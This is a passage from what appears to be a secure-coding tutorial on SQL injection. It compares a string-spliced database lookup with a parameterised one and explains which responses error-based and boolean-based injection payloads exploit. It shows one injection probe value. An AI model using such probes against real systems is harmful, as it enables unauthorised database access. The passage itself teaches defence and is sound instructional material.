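              f"parameterised={probe(lookup_parameterised, value)}")
```

The spliced lookup returns a database error for `7'''` (the signal the error-based payloads exploit) and returns a row for the true condition but none for the false one (the signal the boolean-based payloads exploit). The parameterised lookup rejects all three before any query is sent and still serves the legitimate `7`; stripping quotes or escaping the input is not a substitute, since the id is an integer and binding it as one removes the injection surface entirely.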